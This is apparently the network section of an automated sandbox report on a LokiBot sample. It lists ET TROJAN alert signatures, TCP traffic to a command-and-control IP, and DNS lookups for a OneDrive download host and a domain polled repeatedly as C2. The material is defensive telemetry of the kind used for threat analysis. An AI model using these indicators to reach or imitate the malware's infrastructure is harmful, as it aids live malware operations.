                            02/23/21-08:49:58.700266TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.5192.185.78.145
                            02/23/21-08:49:58.700266TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.5192.185.78.145
                            02/23/21-08:49:58.700266TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.5192.185.78.145
                            02/23/21-08:49:58.700266TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.5192.185.78.145
                            02/23/21-08:49:59.551681TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.5192.185.78.145
                            02/23/21-08:49:59.551681TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.5192.185.78.145
                            02/23/21-08:49:59.551681TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.5192.185.78.145
                            02/23/21-08:49:59.551681TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.5192.185.78.145
                            02/23/21-08:50:00.379572TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.5192.185.78.145
                            02/23/21-08:50:00.379572TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.5192.185.78.145
                            02/23/21-08:50:00.379572TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.5192.185.78.145
                            02/23/21-08:50:00.379572TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.5192.185.78.145
                            02/23/21-08:50:01.225792TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.5192.185.78.145
                            02/23/21-08:50:01.225792TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.5192.185.78.145
                            02/23/21-08:50:01.225792TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.5192.185.78.145
                            02/23/21-08:50:01.225792TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.5192.185.78.145
                            02/23/21-08:50:02.942234TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.5192.185.78.145
                            02/23/21-08:50:02.942234TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977880192.168.2.5192.185.78.145
                            02/23/21-08:50:02.942234TCP2025381ET TROJAN LokiBot Checkin4977880192.168.2.5192.185.78.145
                            02/23/21-08:50:02.942234TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977880192.168.2.5192.185.78.145
                            02/23/21-08:50:04.328154TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977980192.168.2.5192.185.78.145
                            02/23/21-08:50:04.328154TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.5192.185.78.145
                            02/23/21-08:50:04.328154TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.5192.185.78.145
                            02/23/21-08:50:04.328154TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977980192.168.2.5192.185.78.145
                            02/23/21-08:50:05.623107TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.5192.185.78.145
                            02/23/21-08:50:05.623107TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.5192.185.78.145
                            02/23/21-08:50:05.623107TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.5192.185.78.145
                            02/23/21-08:50:05.623107TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.5192.185.78.145

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Feb 23, 2021 08:49:25.152245998 CET4973280192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:25.313786983 CET8049732192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:25.314029932 CET4973280192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:25.317523003 CET4973280192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:25.483153105 CET8049732192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:25.483345032 CET4973280192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:25.644867897 CET8049732192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:25.682240009 CET8049732192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:25.682322979 CET8049732192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:25.682535887 CET4973280192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:25.694196939 CET4973280192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:25.855789900 CET8049732192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:26.127479076 CET4973380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:26.289282084 CET8049733192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:26.289398909 CET4973380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:26.296646118 CET4973380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:26.458342075 CET8049733192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:26.458527088 CET4973380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:26.622454882 CET8049733192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:26.654206038 CET8049733192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:26.654432058 CET8049733192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:26.654504061 CET4973380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:26.656009912 CET4973380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:26.817758083 CET8049733192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:27.340850115 CET4973480192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:27.503067970 CET8049734192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:27.503186941 CET4973480192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:27.514702082 CET4973480192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:27.676667929 CET8049734192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:27.678800106 CET4973480192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:27.840754032 CET8049734192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:27.879473925 CET8049734192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:27.879637003 CET8049734192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:27.879797935 CET4973480192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:27.881252050 CET4973480192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:28.043190956 CET8049734192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:29.023710012 CET4973580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:29.186356068 CET8049735192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:29.186611891 CET4973580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:29.621978045 CET4973580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:29.784499884 CET8049735192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:29.784650087 CET4973580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:29.947127104 CET8049735192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:29.983164072 CET8049735192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:29.983341932 CET8049735192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:29.983460903 CET4973580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:30.455024004 CET4973580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:30.617681980 CET8049735192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:30.900521040 CET4973680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:31.062483072 CET8049736192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:31.062603951 CET4973680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:31.069634914 CET4973680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:31.232635975 CET8049736192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:31.232763052 CET4973680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:31.394557953 CET8049736192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:31.424293995 CET8049736192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:31.424398899 CET8049736192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:31.424508095 CET4973680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:31.428849936 CET4973680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:31.592427015 CET8049736192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:31.773927927 CET4973780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:31.935385942 CET8049737192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:31.935513020 CET4973780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:31.953352928 CET4973780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:32.114769936 CET8049737192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:32.114974976 CET4973780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:32.276938915 CET8049737192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:32.325089931 CET8049737192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:32.325207949 CET8049737192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:32.325285912 CET4973780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:32.326723099 CET4973780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:32.488051891 CET8049737192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:32.727893114 CET4973880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:32.889883995 CET8049738192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:32.890014887 CET4973880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:32.896542072 CET4973880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:33.058557034 CET8049738192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:33.059552908 CET4973880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:33.222285032 CET8049738192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:33.251894951 CET8049738192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:33.252027988 CET8049738192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:33.252095938 CET4973880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:33.253134012 CET4973880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:33.416555882 CET8049738192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:33.587696075 CET4973980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:33.750243902 CET8049739192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:33.750394106 CET4973980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:33.755837917 CET4973980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:33.918559074 CET8049739192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:33.918710947 CET4973980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:34.081176043 CET8049739192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:34.109647989 CET8049739192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:34.109678984 CET8049739192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:34.109770060 CET4973980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:34.120620966 CET4973980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:34.283082008 CET8049739192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:34.462208033 CET4974080192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:34.624281883 CET8049740192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:34.624382973 CET4974080192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:34.630259037 CET4974080192.168.2.5192.185.78.145

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Feb 23, 2021 08:47:51.957576036 CET5270453192.168.2.58.8.8.8
                            Feb 23, 2021 08:47:51.992965937 CET5221253192.168.2.58.8.8.8
                            Feb 23, 2021 08:47:52.009357929 CET53527048.8.8.8192.168.2.5
                            Feb 23, 2021 08:47:52.044507027 CET53522128.8.8.8192.168.2.5
                            Feb 23, 2021 08:47:52.132742882 CET5430253192.168.2.58.8.8.8
                            Feb 23, 2021 08:47:52.173027039 CET5378453192.168.2.58.8.8.8
                            Feb 23, 2021 08:47:52.181622028 CET53543028.8.8.8192.168.2.5
                            Feb 23, 2021 08:47:52.221787930 CET53537848.8.8.8192.168.2.5
                            Feb 23, 2021 08:47:52.821727037 CET6530753192.168.2.58.8.8.8
                            Feb 23, 2021 08:47:52.873526096 CET53653078.8.8.8192.168.2.5
                            Feb 23, 2021 08:47:53.006393909 CET6434453192.168.2.58.8.8.8
                            Feb 23, 2021 08:47:53.055088997 CET53643448.8.8.8192.168.2.5
                            Feb 23, 2021 08:47:53.121504068 CET6206053192.168.2.58.8.8.8
                            Feb 23, 2021 08:47:53.170142889 CET53620608.8.8.8192.168.2.5
                            Feb 23, 2021 08:47:54.098929882 CET6180553192.168.2.58.8.8.8
                            Feb 23, 2021 08:47:54.147650003 CET53618058.8.8.8192.168.2.5
                            Feb 23, 2021 08:47:54.539326906 CET5479553192.168.2.58.8.8.8
                            Feb 23, 2021 08:47:54.599116087 CET53547958.8.8.8192.168.2.5
                            Feb 23, 2021 08:47:55.002402067 CET4955753192.168.2.58.8.8.8
                            Feb 23, 2021 08:47:55.051300049 CET53495578.8.8.8192.168.2.5
                            Feb 23, 2021 08:47:58.169590950 CET6173353192.168.2.58.8.8.8
                            Feb 23, 2021 08:47:58.226943970 CET53617338.8.8.8192.168.2.5
                            Feb 23, 2021 08:47:59.176139116 CET6544753192.168.2.58.8.8.8
                            Feb 23, 2021 08:47:59.227647066 CET53654478.8.8.8192.168.2.5
                            Feb 23, 2021 08:47:59.838608980 CET5244153192.168.2.58.8.8.8
                            Feb 23, 2021 08:47:59.899094105 CET53524418.8.8.8192.168.2.5
                            Feb 23, 2021 08:48:00.771543980 CET6217653192.168.2.58.8.8.8
                            Feb 23, 2021 08:48:00.820616961 CET53621768.8.8.8192.168.2.5
                            Feb 23, 2021 08:48:04.030673027 CET5959653192.168.2.58.8.8.8
                            Feb 23, 2021 08:48:04.082407951 CET53595968.8.8.8192.168.2.5
                            Feb 23, 2021 08:48:07.501413107 CET6529653192.168.2.58.8.8.8
                            Feb 23, 2021 08:48:07.552992105 CET53652968.8.8.8192.168.2.5
                            Feb 23, 2021 08:48:08.807288885 CET6318353192.168.2.58.8.8.8
                            Feb 23, 2021 08:48:08.855995893 CET53631838.8.8.8192.168.2.5
                            Feb 23, 2021 08:48:09.616969109 CET6015153192.168.2.58.8.8.8
                            Feb 23, 2021 08:48:09.668607950 CET53601518.8.8.8192.168.2.5
                            Feb 23, 2021 08:48:11.122785091 CET5696953192.168.2.58.8.8.8
                            Feb 23, 2021 08:48:11.174304962 CET53569698.8.8.8192.168.2.5
                            Feb 23, 2021 08:48:11.978822947 CET5516153192.168.2.58.8.8.8
                            Feb 23, 2021 08:48:12.030325890 CET53551618.8.8.8192.168.2.5
                            Feb 23, 2021 08:48:18.259526014 CET5475753192.168.2.58.8.8.8
                            Feb 23, 2021 08:48:18.321134090 CET53547578.8.8.8192.168.2.5
                            Feb 23, 2021 08:48:30.822457075 CET4999253192.168.2.58.8.8.8
                            Feb 23, 2021 08:48:30.870986938 CET53499928.8.8.8192.168.2.5
                            Feb 23, 2021 08:48:48.706115961 CET6007553192.168.2.58.8.8.8
                            Feb 23, 2021 08:48:48.754849911 CET53600758.8.8.8192.168.2.5
                            Feb 23, 2021 08:48:53.377608061 CET5501653192.168.2.58.8.8.8
                            Feb 23, 2021 08:48:53.426345110 CET53550168.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:12.189282894 CET6434553192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:12.247212887 CET53643458.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:20.678886890 CET5712853192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:20.727756977 CET53571288.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:22.746526003 CET5479153192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:22.859203100 CET53547918.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:24.953957081 CET5046353192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:25.141832113 CET53504638.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:26.067426920 CET5039453192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:26.124541044 CET53503948.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:27.139729977 CET5853053192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:27.337553024 CET53585308.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:28.834021091 CET5381353192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:29.017906904 CET53538138.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:30.838077068 CET6373253192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:30.895327091 CET53637328.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:31.702461958 CET5734453192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:31.759629965 CET53573448.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:32.663688898 CET5445053192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:32.725080013 CET53544508.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:33.527338028 CET5926153192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:33.584520102 CET53592618.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:34.401932001 CET5715153192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:34.459041119 CET53571518.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:35.281724930 CET5941353192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:35.333215952 CET53594138.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:35.402014017 CET6051653192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:35.450622082 CET53605168.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:36.152736902 CET5164953192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:36.212917089 CET53516498.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:39.014914989 CET6508653192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:39.066433907 CET53650868.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:39.839940071 CET5643253192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:39.900213003 CET53564328.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:40.670694113 CET5292953192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:40.853167057 CET53529298.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:41.616817951 CET6431753192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:41.674030066 CET53643178.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:42.491641045 CET6100453192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:42.540183067 CET53610048.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:43.315052032 CET5689553192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:43.366683006 CET53568958.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:44.121681929 CET6237253192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:44.181931973 CET53623728.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:45.044739008 CET6151553192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:45.108205080 CET53615158.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:46.037842035 CET5667553192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:46.097811937 CET53566758.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:46.885462999 CET5717253192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:46.942615032 CET53571728.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:47.076524019 CET5526753192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:47.133769035 CET53552678.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:47.750703096 CET5096953192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:47.783256054 CET6436253192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:47.807673931 CET53509698.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:47.842114925 CET53643628.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:48.049995899 CET5476653192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:48.114898920 CET53547668.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:48.269165039 CET6144653192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:48.330771923 CET53614468.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:48.638226032 CET5751553192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:48.686953068 CET53575158.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:48.914002895 CET5819953192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:48.973217964 CET53581998.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:49.469754934 CET6522153192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:49.529510021 CET53652218.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:49.765470982 CET6157353192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:49.822539091 CET53615738.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:50.380815983 CET5656253192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:50.429570913 CET53565628.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:50.666286945 CET5359153192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:50.728369951 CET53535918.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:51.176249027 CET5968853192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:51.234113932 CET53596888.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:51.972486973 CET5603253192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:52.021190882 CET53560328.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:52.794002056 CET6115053192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:52.850966930 CET53611508.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:53.589860916 CET6345853192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:53.648022890 CET53634588.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:54.398741961 CET5042253192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:54.453586102 CET53504228.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:55.252079010 CET5324753192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:55.309329987 CET53532478.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:56.039648056 CET5854453192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:56.093118906 CET53585448.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:56.871685028 CET5381453192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:56.923170090 CET53538148.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:57.685812950 CET5130553192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:57.742845058 CET53513058.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:58.478722095 CET5367053192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:58.527405977 CET53536708.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:59.317658901 CET5516053192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:59.380300045 CET53551608.8.8.8192.168.2.5
                            Feb 23, 2021 08:50:00.153100967 CET6141453192.168.2.58.8.8.8
                            Feb 23, 2021 08:50:00.204687119 CET53614148.8.8.8192.168.2.5
                            Feb 23, 2021 08:50:00.970994949 CET6384753192.168.2.58.8.8.8
                            Feb 23, 2021 08:50:01.022571087 CET53638478.8.8.8192.168.2.5
                            Feb 23, 2021 08:50:02.258004904 CET6152353192.168.2.58.8.8.8
                            Feb 23, 2021 08:50:02.306612015 CET53615238.8.8.8192.168.2.5
                            Feb 23, 2021 08:50:04.100541115 CET5055153192.168.2.58.8.8.8
                            Feb 23, 2021 08:50:04.158838034 CET53505518.8.8.8192.168.2.5
                            Feb 23, 2021 08:50:05.398031950 CET6284753192.168.2.58.8.8.8
                            Feb 23, 2021 08:50:05.446899891 CET53628478.8.8.8192.168.2.5

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Feb 23, 2021 08:49:20.678886890 CET192.168.2.58.8.8.80xf8afStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:22.746526003 CET192.168.2.58.8.8.80x93ceStandard query (0)hrf0ga.bn.files.1drv.comA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:24.953957081 CET192.168.2.58.8.8.80xdb4eStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:26.067426920 CET192.168.2.58.8.8.80xa0e7Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:27.139729977 CET192.168.2.58.8.8.80x6790Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:28.834021091 CET192.168.2.58.8.8.80xf96fStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:30.838077068 CET192.168.2.58.8.8.80xd073Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:31.702461958 CET192.168.2.58.8.8.80x33aaStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:32.663688898 CET192.168.2.58.8.8.80xd44cStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:33.527338028 CET192.168.2.58.8.8.80x22c5Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:34.401932001 CET192.168.2.58.8.8.80xb9caStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:35.281724930 CET192.168.2.58.8.8.80x6b5Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:36.152736902 CET192.168.2.58.8.8.80x9a3aStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:39.014914989 CET192.168.2.58.8.8.80x12d7Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:39.839940071 CET192.168.2.58.8.8.80x25e9Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:40.670694113 CET192.168.2.58.8.8.80x78ccStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:41.616817951 CET192.168.2.58.8.8.80xc62bStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:42.491641045 CET192.168.2.58.8.8.80x73a4Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:43.315052032 CET192.168.2.58.8.8.80xda20Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:44.121681929 CET192.168.2.58.8.8.80x3245Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:45.044739008 CET192.168.2.58.8.8.80x9662Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:46.037842035 CET192.168.2.58.8.8.80xd00Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:46.885462999 CET192.168.2.58.8.8.80xb63fStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:47.750703096 CET192.168.2.58.8.8.80x3762Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:48.638226032 CET192.168.2.58.8.8.80xb0d5Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:49.469754934 CET192.168.2.58.8.8.80xef29Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:50.380815983 CET192.168.2.58.8.8.80xa120Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:51.176249027 CET192.168.2.58.8.8.80x26d4Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:51.972486973 CET192.168.2.58.8.8.80x24a9Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:52.794002056 CET192.168.2.58.8.8.80x4bcdStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:53.589860916 CET192.168.2.58.8.8.80x1c9dStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:54.398741961 CET192.168.2.58.8.8.80x275aStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:55.252079010 CET192.168.2.58.8.8.80x1b29Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:56.039648056 CET192.168.2.58.8.8.80x5404Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:56.871685028 CET192.168.2.58.8.8.80xaf87Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:57.685812950 CET192.168.2.58.8.8.80x135bStandard query (0)accessasia.com.hkA (IP address)IN (0x0001)
                            Feb 23, 2021 08:49:58.478722095 CET192.168.2.58.8.8.80xeb5Standard query (0)accessasia.com.hkA (IP address)IN (0x0001)
